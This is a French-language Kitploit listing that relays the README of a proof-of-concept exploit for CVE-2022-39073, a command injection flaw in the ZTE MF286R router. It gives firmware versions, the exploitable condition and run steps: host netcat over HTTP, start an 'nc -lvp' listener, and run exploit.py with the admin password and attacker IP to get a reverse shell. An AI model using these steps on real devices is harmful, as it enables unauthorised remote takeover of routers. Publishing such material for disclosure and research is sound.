Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-39073 — Preuve de concept de la vulnérabilité d'injection de commandes affectant le routeur ZTE MF286R, incluant un exploit RCE. | Kitploit
Outils/GitHubGitHub/v0lp3/cve-2022-39073
Sécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleOutil d'Accès à Distance
GitHubv0lp3/cve-2022-39073

CVE-2022-39073

Preuve de concept de la vulnérabilité d'injection de commandes affectant le routeur ZTE MF286R, incluant un exploit RCE.

Voir le dépôt
11413il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-39073

Détails du firmware :

root@kitploit:~
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10

Prérequis

  • requests (pip install requests)

Injection de commande

La vulnérabilité est une injection de commande partagée entre le binaire zte_net_link_detect et le gestionnaire WATCH_DOG_SWITCH dans le binaire du serveur web goahead.

Notez que la vulnérabilité ne peut être exploitée que lorsque le routeur est connecté au WAN ou à Internet via une carte SIM. (La valeur de la clé "ppp_status" doit être "ppp_connected" ou "ipv4_ipv6_connected" ou "ipv6_connected").

Risques

  • Exécution de code à distance (RCE)
  • Exécution de commande arbitraire

Preuve de concept

L'idée de l'exploit est de télécharger le binaire statique netcat depuis un serveur HTTP, puis d'ouvrir un reverse shell avec lui. P.S. : Le netcat inclus dans ce dossier est big endian.

  • Ouvrez un serveur HTTP dans ce répertoire python3 -m http.server 8080
  • Ouvrez un socket d'écoute sur le port 9999 avec nc -lvp 9999
  • Exécutez le script dans ce dossier python3 exploit.py http://<routeur> <mot_de_passe_admin> <ip_attaquant, ex: 192.168.1.101>

Références

Cette vulnérabilité a été rapportée par Andrea Maugeri en septembre 2022. https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664

Télécharger l’outil